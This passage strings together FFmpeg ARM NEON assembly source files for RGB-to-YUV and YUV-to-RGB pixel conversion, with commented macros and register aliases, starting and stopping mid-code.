vst1.16 {d6}, [r8], r12
vld1.32 {q10}, [r6,:128]!
vcvt.s32.f32 q10, q10, #31
vst1.16 {d3}, [r8], r12
vld1.32 {q11}, [r7,:128]!
vcvt.s32.f32 q11, q11, #31
vst1.16 {d7}, [r8], r12
b 6b
7: vst1.16 {d2}, [r8], r12
vst1.16 {d6}, [r8], r12
vst1.16 {d3}, [r8], r12
vst1.16 {d7}, [r8], r12
subs r3, r3, #4
it eq
popeq {r4-r8, pc}
cmp r3, #4
add r0, r0, #8
bge 5b
@ 2 channels
4: cmp r3, #2
blt 4f
ldm r1!, {r4-r5}
mov lr, r2
mov r8, r0
tst lr, #8
vld1.32 {q8}, [r4,:128]!
vcvt.s32.f32 q8, q8, #31
vld1.32 {q9}, [r5,:128]!
vcvt.s32.f32 q9, q9, #31
vld1.32 {q10}, [r4,:128]!
vcvt.s32.f32 q10, q10, #31
vld1.32 {q11}, [r5,:128]!
vcvt.s32.f32 q11, q11, #31
beq 6f
subs lr, lr, #8
beq 7f
vsri.32 d18, d16, #16
vsri.32 d19, d17, #16
vld1.32 {q8}, [r4,:128]!
vcvt.s32.f32 q8, q8, #31
vst1.32 {d18[0]}, [r8], r12
vsri.32 d22, d20, #16
vst1.32 {d18[1]}, [r8], r12
vsri.32 d23, d21, #16
vst1.32 {d19[0]}, [r8], r12
vst1.32 {d19[1]}, [r8], r12
vld1.32 {q9}, [r5,:128]!
vcvt.s32.f32 q9, q9, #31
vst1.32 {d22[0]}, [r8], r12
vst1.32 {d22[1]}, [r8], r12
vld1.32 {q10}, [r4,:128]!
vcvt.s32.f32 q10, q10, #31
vst1.32 {d23[0]}, [r8], r12
vst1.32 {d23[1]}, [r8], r12
vld1.32 {q11}, [r5,:128]!
vcvt.s32.f32 q11, q11, #31
6: subs lr, lr, #16
vld1.32 {q0}, [r4,:128]!
vcvt.s32.f32 q0, q0, #31
vsri.32 d18, d16, #16
vld1.32 {q1}, [r5,:128]!
vcvt.s32.f32 q1, q1, #31
vsri.32 d19, d17, #16
vld1.32 {q2}, [r4,:128]!
vcvt.s32.f32 q2, q2, #31
vld1.32 {q3}, [r5,:128]!
vcvt.s32.f32 q3, q3, #31
vst1.32 {d18[0]}, [r8], r12
vsri.32 d22, d20, #16
vst1.32 {d18[1]}, [r8], r12
vsri.32 d23, d21, #16
vst1.32 {d19[0]}, [r8], r12
vsri.32 d2, d0, #16
vst1.32 {d19[1]}, [r8], r12
vsri.32 d3, d1, #16
vst1.32 {d22[0]}, [r8], r12
vsri.32 d6, d4, #16
vst1.32 {d22[1]}, [r8], r12
vsri.32 d7, d5, #16
vst1.32 {d23[0]}, [r8], r12
vst1.32 {d23[1]}, [r8], r12
beq 6f
vld1.32 {q8}, [r4,:128]!
vcvt.s32.f32 q8, q8, #31
vst1.32 {d2[0]}, [r8], r12
vst1.32 {d2[1]}, [r8], r12
vld1.32 {q9}, [r5,:128]!
vcvt.s32.f32 q9, q9, #31
vst1.32 {d3[0]}, [r8], r12
vst1.32 {d3[1]}, [r8], r12
vld1.32 {q10}, [r4,:128]!
vcvt.s32.f32 q10, q10, #31
vst1.32 {d6[0]}, [r8], r12
vst1.32 {d6[1]}, [r8], r12
vld1.32 {q11}, [r5,:128]!
vcvt.s32.f32 q11, q11, #31
vst1.32 {d7[0]}, [r8], r12
vst1.32 {d7[1]}, [r8], r12
bgt 6b
6: vst1.32 {d2[0]}, [r8], r12
vst1.32 {d2[1]}, [r8], r12
vst1.32 {d3[0]}, [r8], r12
vst1.32 {d3[1]}, [r8], r12
vst1.32 {d6[0]}, [r8], r12
vst1.32 {d6[1]}, [r8], r12
vst1.32 {d7[0]}, [r8], r12
vst1.32 {d7[1]}, [r8], r12
b 8f
7: vsri.32 d18, d16, #16
vsri.32 d19, d17, #16
vst1.32 {d18[0]}, [r8], r12
vsri.32 d22, d20, #16
vst1.32 {d18[1]}, [r8], r12
vsri.32 d23, d21, #16
vst1.32 {d19[0]}, [r8], r12
vst1.32 {d19[1]}, [r8], r12
vst1.32 {d22[0]}, [r8], r12
vst1.32 {d22[1]}, [r8], r12
vst1.32 {d23[0]}, [r8], r12
vst1.32 {d23[1]}, [r8], r12
8: subs r3, r3, #2
add r0, r0, #4
it eq
popeq {r4-r8, pc}
@ 1 channel
4: ldr r4, [r1]
tst r2, #8
mov lr, r2
mov r5, r0
vld1.32 {q0}, [r4,:128]!
vcvt.s32.f32 q0, q0, #31
vld1.32 {q1}, [r4,:128]!
vcvt.s32.f32 q1, q1, #31
bne 8f
6: subs lr, lr, #16
vld1.32 {q2}, [r4,:128]!
vcvt.s32.f32 q2, q2, #31
vld1.32 {q3}, [r4,:128]!
vcvt.s32.f32 q3, q3, #31
vst1.16 {d0[1]}, [r5,:16], r12
vst1.16 {d0[3]}, [r5,:16], r12
vst1.16 {d1[1]}, [r5,:16], r12
vst1.16 {d1[3]}, [r5,:16], r12
vst1.16 {d2[1]}, [r5,:16], r12
vst1.16 {d2[3]}, [r5,:16], r12
vst1.16 {d3[1]}, [r5,:16], r12
vst1.16 {d3[3]}, [r5,:16], r12
beq 7f
vld1.32 {q0}, [r4,:128]!
vcvt.s32.f32 q0, q0, #31
vld1.32 {q1}, [r4,:128]!
vcvt.s32.f32 q1, q1, #31
7: vst1.16 {d4[1]}, [r5,:16], r12
vst1.16 {d4[3]}, [r5,:16], r12
vst1.16 {d5[1]}, [r5,:16], r12
vst1.16 {d5[3]}, [r5,:16], r12
vst1.16 {d6[1]}, [r5,:16], r12
vst1.16 {d6[3]}, [r5,:16], r12
vst1.16 {d7[1]}, [r5,:16], r12
vst1.16 {d7[3]}, [r5,:16], r12
bgt 6b
pop {r4-r8, pc}
8: subs lr, lr, #8
vst1.16 {d0[1]}, [r5,:16], r12
vst1.16 {d0[3]}, [r5,:16], r12
vst1.16 {d1[1]}, [r5,:16], r12
vst1.16 {d1[3]}, [r5,:16], r12
vst1.16 {d2[1]}, [r5,:16], r12
vst1.16 {d2[3]}, [r5,:16], r12
vst1.16 {d3[1]}, [r5,:16], r12
vst1.16 {d3[3]}, [r5,:16], r12
it eq
popeq {r4-r8, pc}
vld1.32 {q0}, [r4,:128]!
vcvt.s32.f32 q0, q0, #31
vld1.32 {q1}, [r4,:128]!
vcvt.s32.f32 q1, q1, #31
b 6b
endfunc
|
Akagi201/ffmpeg-xcode
| 2,242
|
ffmpeg-3.0.2/libswscale/arm/rgb2yuv_neon_16.S
|
/*
* Copyright (C) 2013 Xiaolei Yu <dreifachstein@gmail.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "rgb2yuv_neon_common.S"
/* downsampled R16G16B16 x8 */
// Register aliases for the 16-bit-precision RGB->YUV kernel.
// r16x8/g16x8/b16x8: 8 downsampled u16 samples per channel (see downsample).
alias_qw r16x8, q7
alias_qw g16x8, q8
alias_qw b16x8, q9
// n16x16_*: u8->u16 widened source pixels (scratch for compute_y_16x1_step).
alias n16x16_l, q11
alias n16x16_h, q12
// y16x16_*: 16-bit luma accumulators; y8x16: final packed 8-bit luma.
alias y16x16_l, q13
alias y16x16_h, q14
alias_qw y8x16, q15
// Load the 3x3 s32 coefficient table from \src and set up constants.
// vld3 de-interleaves the 9 coefficients into per-channel columns
// (q13 = R column, q14 = G column, q15 = B column); they are then
// narrowed to s16 with rounding (>> 7) for the 16-bit-precision kernel.
// BIAS_Y = 16 (luma offset), BIAS_U = 128 (chroma offset; BIAS_V aliases it).
.macro init src
vld3.i32 {q13_l, q14_l, q15_l}, [\src]!
vld3.i32 {q13_h[0], q14_h[0], q15_h[0]}, [\src]
vrshrn.i32 CO_R, q13, #7
vrshrn.i32 CO_G, q14, #7
vrshrn.i32 CO_B, q15, #7
vmov.u8 BIAS_Y, #16
vmov.u8 BIAS_U, #128
.endm
// One multiply/accumulate step of the luma computation:
// widen 16 u8 samples of \s8x16 to u16 and apply \action (vmul or vmla)
// with the scalar coefficient \coeff into the y16x16 accumulators.
.macro compute_y_16x1_step action, s8x16, coeff
vmovl.u8 n16x16_l, \s8x16\()_l
vmovl.u8 n16x16_h, \s8x16\()_h
\action y16x16_l, n16x16_l, \coeff
\action y16x16_h, n16x16_h, \coeff
.endm
// Y = ((R*CO_RY + G*CO_GY + B*CO_BY) + rounding) >> 8 + BIAS_Y
// for 16 pixels; result packed to u8 in y8x16.
.macro compute_y_16x1
compute_y_16x1_step vmul, r8x16, CO_RY
compute_y_16x1_step vmla, g8x16, CO_GY
compute_y_16x1_step vmla, b8x16, CO_BY
vrshrn.i16 y8x16_l, y16x16_l, #8
vrshrn.i16 y8x16_h, y16x16_h, #8
vadd.u8 y8x16, y8x16, BIAS_Y
.endm
// c16x8: 16-bit chroma accumulator; c8x8x2: packed U8/V8 output pair.
alias c16x8, q15
alias_qw c8x8x2, q10
// One chroma plane (\c = u or v, \C = U or V) from the 8 downsampled
// 16-bit RGB samples: C = (R*CO_RC + G*CO_GC + B*CO_BC + rounding) >> 8 + bias.
.macro compute_chroma_8x1 c, C
vmul c16x8, r16x8, CO_R\C
vmla c16x8, g16x8, CO_G\C
vmla c16x8, b16x8, CO_B\C
vrshrn.i16 \c\()8x8, c16x8, #8
vadd.u8 \c\()8x8, \c\()8x8, BIAS_\C
.endm
// Instantiate rgbx_to_nv12_neon_16 (see loop_420sp in rgb2yuv_neon_common.S).
loop_420sp rgbx, nv12, init, kernel_420_16x2, 16
|
Akagi201/ffmpeg-xcode
| 3,230
|
ffmpeg-3.0.2/libswscale/arm/rgb2yuv_neon_32.S
|
/*
* Copyright (C) 2013 Xiaolei Yu <dreifachstein@gmail.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "rgb2yuv_neon_common.S"
/* downsampled R16G16B16 x8 */
alias_qw r16x8, q7
alias_qw g16x8, q8
alias_qw b16x8, q9
alias n16x16_o, q11
alias n16x16_ol, q11_l
alias n16x16_oh, q11_h
alias y32x16_el, q12
alias y32x16_eh, q13
alias y32x16_ol, q14
alias y32x16_oh, q15
alias y16x16_e, q12
alias y16x16_el, q12_l
alias y16x16_eh, q12_h
alias y16x16_o, q13
alias y16x16_ol, q13_l
alias y16x16_oh, q13_h
alias y8x16, y16x16_e
// Load the 3x3 s32 coefficient table and set up constants for the
// 32-bit-precision kernel. Unlike the 16-bit variant, coefficients are
// narrowed with a plain truncating vmovn (kept at full 16-bit precision;
// the extra bits are shifted out later with vrshrn #15).
.macro init src
// load s32x3x3, narrow to s16x3x3
vld3.i32 {q13_l, q14_l, q15_l}, [\src]!
vld3.i32 {q13_h[0], q14_h[0], q15_h[0]}, [\src]
vmovn.i32 CO_R, q13
vmovn.i32 CO_G, q14
vmovn.i32 CO_B, q15
vmov.u8 BIAS_Y, #16
vmov.u8 BIAS_U, #128
.endm
// One long-multiply step of the luma computation.  vtrn.u8 against a
// zero register splits \s8x16 into even bytes (left in \s8x16, now
// zero-extended u16) and odd bytes (moved into n16x16_o); \action
// (vmull/vmlal) then accumulates both streams into 32-bit lanes.
.macro compute_y_16x1_step action, s8x16, coeff
vmov.u8 n16x16_o, #0
vtrn.u8 \s8x16, n16x16_o
\action y32x16_el, \s8x16\()_l, \coeff
\action y32x16_eh, \s8x16\()_h, \coeff
\action y32x16_ol, n16x16_ol, \coeff
\action y32x16_oh, n16x16_oh, \coeff
.endm
/*
 * Y = ((R*CO_RY + G*CO_GY + B*CO_BY + rounding) >> 15) + BIAS_Y for 16 px.
 * in: r8x16, g8x16, b8x16
 * out: y8x16
 * clobber: q11-q15, r8x16, g8x16, b8x16
 */
.macro compute_y_16x1
compute_y_16x1_step vmull, r8x16, CO_RY
compute_y_16x1_step vmlal, g8x16, CO_GY
compute_y_16x1_step vmlal, b8x16, CO_BY
vrshrn.i32 y16x16_el, y32x16_el, #15
vrshrn.i32 y16x16_eh, y32x16_eh, #15
vrshrn.i32 y16x16_ol, y32x16_ol, #15
vrshrn.i32 y16x16_oh, y32x16_oh, #15
// re-interleave even/odd bytes back into source order
vtrn.8 y16x16_e, y16x16_o
vadd.u8 y8x16, y8x16, BIAS_Y
.endm
// 32-bit chroma accumulators, 16-bit narrowed result, packed U/V output.
alias c32x8_l, q14
alias c32x8_h, q15
alias_qw c16x8, q13
alias_qw c8x8x2, q10
// One long multiply/accumulate of a chroma coefficient over 8 samples.
.macro compute_chroma_8x1_step action, s16x8, coeff
\action c32x8_l, \s16x8\()_l, \coeff
\action c32x8_h, \s16x8\()_h, \coeff
.endm
/*
 * C = ((R*CO_RC + G*CO_GC + B*CO_BC + rounding) >> 15) + bias for 8 px.
 * in: r16x8, g16x8, b16x8
 * out: c8x8
 * clobber: q14-q15
 */
.macro compute_chroma_8x1 c, C
compute_chroma_8x1_step vmull, r16x8, CO_R\C
compute_chroma_8x1_step vmlal, g16x8, CO_G\C
compute_chroma_8x1_step vmlal, b16x8, CO_B\C
vrshrn.i32 c16x8_l, c32x8_l, #15
vrshrn.i32 c16x8_h, c32x8_h, #15
vmovn.i16 \c\()8x8, c16x8
vadd.u8 \c\()8x8, \c\()8x8, BIAS_\C
.endm
// Instantiate rgbx_to_nv12_neon_32 (see loop_420sp in rgb2yuv_neon_common.S).
loop_420sp rgbx, nv12, init, kernel_420_16x2, 32
|
Akagi201/ffmpeg-xcode
| 6,921
|
ffmpeg-3.0.2/libswscale/arm/rgb2yuv_neon_common.S
|
/*
* Copyright (C) 2013 Xiaolei Yu <dreifachstein@gmail.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
// Define (\set != 0) or undefine (\set == 0) a register alias \name -> \tgt.
// Pairing define/undefine keeps .req names scoped to the macro that uses them.
.macro alias name, tgt, set=1
.if \set != 0
\name .req \tgt
.else
.unreq \name
.endif
.endm
// Recursively define qN_l / qN_h as the low/high d-register halves of
// every q register (q0_l=d0, q0_h=d1, ... q15_l=d30, q15_h=d31).
// .altmacro is needed for the %(expr) argument evaluation in the recursion.
.altmacro
.macro alias_dw_all qw, dw_l, dw_h
alias q\qw\()_l, d\dw_l
alias q\qw\()_h, d\dw_h
.if \qw < 15
alias_dw_all %(\qw + 1), %(\dw_l + 2), %(\dw_h + 2)
.endif
.endm
alias_dw_all 0, 0, 1
.noaltmacro
// Alias a full q register together with its _l/_h d-register halves.
.macro alias_qw name, qw, set=1
alias \name\(), \qw, \set
alias \name\()_l, \qw\()_l, \set
alias \name\()_h, \qw\()_h, \set
.endm
// Save all callee-saved core registers (r4-r11), r12 and lr, plus the
// callee-saved VFP/NEON registers q4-q7 (AAPCS: d8-d15 must be preserved).
.macro prologue
push {r4-r12, lr}
vpush {q4-q7}
.endm
// Restore everything pushed by prologue and return (pops pc).
.macro epilogue
vpop {q4-q7}
pop {r4-r12, pc}
.endm
// Load stacked argument number \ix (0-based; args 0-3 are in r0-r3).
// Offset skips the 10 core registers and 4 q registers saved by prologue.
.macro load_arg reg, ix
ldr \reg, [sp, #((10 * 4 + 4 * 16) + (\ix - 4) * 4)]
.endm
/* ()_to_()_neon(const uint8_t *src, uint8_t *y, uint8_t *chroma
 * int width, int height,
 * int y_stride, int c_stride, int src_stride,
 * int32_t coeff_table[9]);
 */
// Named register map for loop_420sp.  Note the deliberate overlaps:
// header shares r3 with width, c_padding shares r6 with c_stride, and
// coeff_table shares r12 with y1 (the table pointer is consumed by \init
// before y1 is first written).  Called with set=0 to undo all aliases.
.macro alias_loop_420sp set=1
alias src, r0, \set
alias src0, src, \set
alias y, r1, \set
alias y0, y, \set
alias chroma, r2, \set
alias width, r3, \set
alias header, width, \set
alias height, r4, \set
alias y_stride, r5, \set
alias c_stride, r6, \set
alias c_padding, c_stride, \set
alias src_stride, r7, \set
alias y0_end, r8, \set
alias src_padding,r9, \set
alias y_padding, r10, \set
alias src1, r11, \set
alias y1, r12, \set
alias coeff_table,r12, \set
.endm
// Emit an exported function \s_fmt\()_to_\d_fmt\()_neon_\precision that
// walks the image two rows at a time (4:2:0 chroma is subsampled 2x2).
// \init loads the coefficient table; \kernel processes a 16x2 pixel tile.
// A width that is not a multiple of 16 is handled by running the kernel
// once per row pair with the remainder count ("header") before the
// full-tile loop; the full-tile loop then re-covers part of that span,
// keeping all stores 16-wide.
.macro loop_420sp s_fmt, d_fmt, init, kernel, precision
function \s_fmt\()_to_\d_fmt\()_neon_\precision, export=1
prologue
alias_loop_420sp
load_arg height, 4
load_arg y_stride, 5
load_arg c_stride, 6
load_arg src_stride, 7
load_arg coeff_table, 8
\init coeff_table
// per-row paddings: stride minus the bytes the kernels advance
sub y_padding, y_stride, width
sub c_padding, c_stride, width
sub src_padding, src_stride, width, LSL #2
add y0_end, y0, width
and header, width, #15
add y1, y0, y_stride
add src1, src0, src_stride
0:
cmp header, #0
beq 1f
// partial leading tile (width % 16 pixels)
\kernel \s_fmt, \d_fmt, src0, src1, y0, y1, chroma, header
1:
// full 16-pixel tiles until the luma row pointer reaches y0_end
\kernel \s_fmt, \d_fmt, src0, src1, y0, y1, chroma
cmp y0, y0_end
blt 1b
2:
// advance all pointers to the next pair of rows
add y0, y1, y_padding
add y0_end, y1, y_stride
add chroma, chroma, c_padding
add src0, src1, src_padding
add y1, y0, y_stride
add src1, src0, src_stride
subs height, height, #2
bgt 0b
epilogue
alias_loop_420sp 0
endfunc
.endm
// Horizontal 2:1 downsample of the first row: pairwise-add adjacent
// u8 samples into u16 sums (r16x8 etc. hold 8 sums of 2 pixels each).
.macro downsample
vpaddl.u8 r16x8, r8x16
vpaddl.u8 g16x8, g8x16
vpaddl.u8 b16x8, b8x16
.endm
/* accumulate the second row and right shift by 2 */
// vpadal adds the second row's pairwise sums onto the first row's, so
// each lane holds the sum of a 2x2 pixel block; vrshr then rounds and
// divides by 4 to produce the averaged chroma source samples.
.macro downsample_ars2
vpadal.u8 r16x8, r8x16
vpadal.u8 g16x8, g8x16
vpadal.u8 b16x8, b8x16
vrshr.u16 r16x8, r16x8, #2
vrshr.u16 g16x8, g16x8, #2
vrshr.u16 b16x8, b16x8, #2
.endm
// Store 16 luma bytes.  With no \count the pointer post-increments by 16;
// with \count it advances by \count bytes instead (partial-tile path,
// where the next full tile intentionally overlaps this store).
.macro store_y8_16x1 dst, count
.ifc "\count",""
vstmia \dst!, {y8x16}
.else
vstmia \dst, {y8x16}
add \dst, \dst, \count
.endif
.endm
// Store 8 interleaved U,V byte pairs (NV12 order).
.macro store_chroma_nv12_8x1 dst, count
.ifc "\count",""
vst2.i8 {u8x8, v8x8}, [\dst]!
.else
vst2.i8 {u8x8, v8x8}, [\dst], \count
.endif
.endm
// Store 8 interleaved V,U byte pairs (NV21 order).
.macro store_chroma_nv21_8x1 dst, count
.ifc "\count",""
vst2.i8 {v8x8, u8x8}, [\dst]!
.else
vst2.i8 {v8x8, u8x8}, [\dst], \count
.endif
.endm
// Load 16 four-byte pixels, de-interleaving the components into
// \a/\b/\c/\d (two vld4.8 of 8 pixels each).  Without \count the source
// pointer ends 64 bytes ahead; with \count it is rewound and advanced by
// \count pixels (4 bytes each) for the partial-tile path.
.macro load_8888_16x1 a, b, c, d, src, count
.ifc "\count",""
vld4.8 {\a\()8x16_l, \b\()8x16_l, \c\()8x16_l, \d\()8x16_l}, [\src]!
vld4.8 {\a\()8x16_h, \b\()8x16_h, \c\()8x16_h, \d\()8x16_h}, [\src]!
.else
vld4.8 {\a\()8x16_l, \b\()8x16_l, \c\()8x16_l, \d\()8x16_l}, [\src]!
vld4.8 {\a\()8x16_h, \b\()8x16_h, \c\()8x16_h, \d\()8x16_h}, [\src]
sub \src, \src, #32
add \src, \src, \count, LSL #2
.endif
.endm
// Component orderings for RGBX and BGRX input (x = ignored 4th byte).
.macro load_rgbx_16x1 src, count
load_8888_16x1 r, g, b, x, \src, \count
.endm
.macro load_bgrx_16x1 src, count
load_8888_16x1 b, g, r, x, \src, \count
.endm
// Bind (or with set=0 unbind) the per-format register names used by the
// kernel: source component registers for RGBX/BGRX, and u8x8/v8x8 mapped
// onto the two halves of c8x8x2 in the order the chroma store expects.
.macro alias_src_rgbx set=1
alias_src_8888 r, g, b, x, \set
.endm
.macro alias_src_bgrx set=1
alias_src_8888 b, g, r, x, \set
.endm
.macro alias_dst_nv12 set=1
alias u8x8, c8x8x2_l, \set
alias v8x8, c8x8x2_h, \set
.endm
.macro alias_dst_nv21 set=1
alias v8x8, c8x8x2_l, \set
alias u8x8, c8x8x2_h, \set
.endm
// common aliases
// Coefficient lanes: d0/d1/d2 each hold a channel's {Y, U, V} coefficients
// as s16 scalar lanes, loaded by the per-precision init macros.
alias CO_R d0
CO_RY .dn d0.s16[0]
CO_RU .dn d0.s16[1]
CO_RV .dn d0.s16[2]
alias CO_G d1
CO_GY .dn d1.s16[0]
CO_GU .dn d1.s16[1]
CO_GV .dn d1.s16[2]
alias CO_B d2
CO_BY .dn d2.s16[0]
CO_BU .dn d2.s16[1]
CO_BV .dn d2.s16[2]
// U and V share one bias register (both 128); luma bias is a full q reg.
alias BIAS_U, d3
alias BIAS_V, BIAS_U
alias BIAS_Y, q2
/* q3-q6 R8G8B8X8 x16 */
// Bind \a/\b/\c/\d 8x16 component names onto q3-q6 (set=0 unbinds).
.macro alias_src_8888 a, b, c, d, set
alias_qw \a\()8x16, q3, \set
alias_qw \b\()8x16, q4, \set
alias_qw \c\()8x16, q5, \set
alias_qw \d\()8x16, q6, \set
.endm
// Process one 16x2 pixel tile of a 4:2:0 image:
//   row 0: load 16 RGBX pixels, start the 2x2 downsample, compute+store Y
//   row 1: load 16 more, finish the downsample average, compute+store Y
//   then compute and store 8 interleaved U/V samples for the tile.
// \count, when given, is the partial tile width (width % 16).
.macro kernel_420_16x2 rgb_fmt, yuv_fmt, rgb0, rgb1, y0, y1, chroma, count
alias_src_\rgb_fmt
alias_dst_\yuv_fmt
load_\rgb_fmt\()_16x1 \rgb0, \count
downsample
compute_y_16x1
store_y8_16x1 \y0, \count
load_\rgb_fmt\()_16x1 \rgb1, \count
downsample_ars2
compute_y_16x1
store_y8_16x1 \y1, \count
compute_chroma_8x1 u, U
compute_chroma_8x1 v, V
store_chroma_\yuv_fmt\()_8x1 \chroma, \count
alias_dst_\yuv_fmt 0
alias_src_\rgb_fmt 0
.endm
|
Akagi201/ffmpeg-xcode
| 18,411
|
ffmpeg-3.0.2/libswscale/arm/yuv2rgb_neon.S
|
/*
* Copyright (c) 2015 Matthieu Bouron <matthieu.bouron stupeflix.com>
* Copyright (c) 2015 Clément Bœsch <clement stupeflix.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
@ Duplicate each 16-bit U/V sample (chroma is half-width) and multiply by
@ the red/green/blue coefficients from d1, producing the chroma
@ contributions for 16 pixels in q8-q13 (16-bit precision variant).
.macro compute_premult_16 half_u1, half_u2, half_v1, half_v2
vmov d2, \half_u1 @ copy left q14 to left q1
vmov d3, \half_u1 @ copy left q14 to right q1
vmov d4, \half_u2 @ copy right q14 to left q2
vmov d5, \half_u2 @ copy right q14 to right q2
vmov d6, \half_v1 @ copy left q15 to left q3
vmov d7, \half_v1 @ copy left q15 to right q3
vmov d8, \half_v2 @ copy right q15 to left q4
vmov d9, \half_v2 @ copy right q15 to right q4
vzip.16 d2, d3 @ U1U1U2U2U3U3U4U4
vzip.16 d4, d5 @ U5U5U6U6U7U7U8U8
vzip.16 d6, d7 @ V1V1V2V2V3V3V4V4
vzip.16 d8, d9 @ V5V5V6V6V7V7V8V8
vmul.s16 q8, q3, d1[0] @ V * v2r (left, red)
vmul.s16 q9, q4, d1[0] @ V * v2r (right, red)
vmul.s16 q10, q1, d1[1] @ U * u2g
vmul.s16 q11, q2, d1[1] @ U * u2g
vmla.s16 q10, q3, d1[2] @ U * u2g + V * v2g (left, green)
vmla.s16 q11, q4, d1[2] @ U * u2g + V * v2g (right, green)
vmul.s16 q12, q1, d1[3] @ U * u2b (left, blue)
vmul.s16 q13, q2, d1[3] @ U * u2b (right, blue)
.endm
@ Same premultiplication for 8 pixels at 32-bit precision: vmull/vmlal
@ widen the s16 products into s32 accumulators q8-q13.
.macro compute_premult_32 half_u half_v
vmov d2, \half_u @ copy left q14 to left q1
vmov d3, \half_u @ copy left q14 to right q1
vmov d4, \half_v @ copy left q15 to left q2
vmov d5, \half_v @ copy left q15 to right q2
vzip.16 d2, d3 @ U1U1U2U2U3U3U4U4
vzip.16 d4, d5 @ V1V1V2V2V3V3V4V4
vmull.s16 q8, d4, d1[0] @ V * v2r (left, red)
vmull.s16 q9, d5, d1[0] @ V * v2r (right, red)
vmull.s16 q10, d2, d1[1] @ U * u2g
vmull.s16 q11, d3, d1[1] @ U * u2g
vmlal.s16 q10, d4, d1[2] @ U * u2g + V * v2g (left, green)
vmlal.s16 q11, d5, d1[2] @ U * u2g + V * v2g (right, green)
vmull.s16 q12, d2, d1[3] @ U * u2b (left, blue)
vmull.s16 q13, d3, d1[3] @ U * u2b (right, blue)
.endm
@ Add the luma term (q14/q15) to a premultiplied chroma contribution and
@ saturating-round to u8 (>> 6 matches the 16-bit pipeline's scaling).
.macro compute_color_16 dst_comp1 dst_comp2 pre1 pre2
vadd.s16 q1, q14, \pre1
vadd.s16 q2, q15, \pre2
vqrshrun.s16 \dst_comp1, q1, #6
vqrshrun.s16 \dst_comp2, q2, #6
.endm
@ 32-bit variant: add the s32 luma term (q1/q2), narrow twice
@ (s32 -> u16 with >> 13, then u16 -> u8) with saturation.
.macro compute_color_32 dst_comp pre1 pre2
vadd.s32 q3, q1, \pre1
vadd.s32 q4, q2, \pre2
vqrshrun.s32 d10, q3, #13
vqrshrun.s32 d11, q4, #13 @ q5 = ({q3,q4} + (1<<12)) >> 13
vqmovn.u16 \dst_comp, q5 @ saturate 16bit -> 8bit
.endm
@ Produce all four output components; the caller picks the destination
@ registers to get the requested channel order, alpha is fixed at 255.
.macro compute_rgba_16 r1 r2 g1 g2 b1 b2 a1 a2
compute_color_16 \r1, \r2, q8, q9
compute_color_16 \g1, \g2, q10, q11
compute_color_16 \b1, \b2, q12, q13
vmov.u8 \a1, #255
vmov.u8 \a2, #255
.endm
.macro compute_rgba_32 r g b a
compute_color_32 \r, q8, q9
compute_color_32 \g, q10, q11
compute_color_32 \b, q12, q13
vmov.u8 \a, #255
.endm
@ Convert 16 luma bytes (\y0,\y1) plus the premultiplied chroma in q8-q13
@ into 16 interleaved 4-byte pixels and store them (16-bit precision).
@ The .ifc blocks select the register layout matching the output order.
.macro compute_16px_16 dst y0 y1 ofmt
vmovl.u8 q14, \y0 @ 8px of y
vmovl.u8 q15, \y1 @ 8px of y
vdup.16 q5, r9 @ q5 = y_offset
vmov d14, d0 @ q7 = y_coeff
vmov d15, d0 @ q7 = y_coeff
vsub.s16 q14, q5
vsub.s16 q15, q5
vmul.s16 q14, q7 @ q14 = (srcY - y_offset) * y_coeff (left)
vmul.s16 q15, q7 @ q15 = (srcY - y_offset) * y_coeff (right)
.ifc \ofmt,argb
compute_rgba_16 d7, d11, d8, d12, d9, d13, d6, d10
.endif
.ifc \ofmt,rgba
compute_rgba_16 d6, d10, d7, d11, d8, d12, d9, d13
.endif
.ifc \ofmt,abgr
compute_rgba_16 d9, d13, d8, d12, d7, d11, d6, d10
.endif
.ifc \ofmt,bgra
compute_rgba_16 d8, d12, d7, d11, d6, d10, d9, d13
.endif
vst4.8 {q3, q4}, [\dst,:128]!
vst4.8 {q5, q6}, [\dst,:128]!
.endm
@ 32-bit precision variant: 8 luma bytes at a time, widening multiply.
.macro compute_8px_32 dst half_y ofmt
vmovl.u8 q7, \half_y @ 8px of Y
vdup.16 q5, r9
vsub.s16 q7, q5
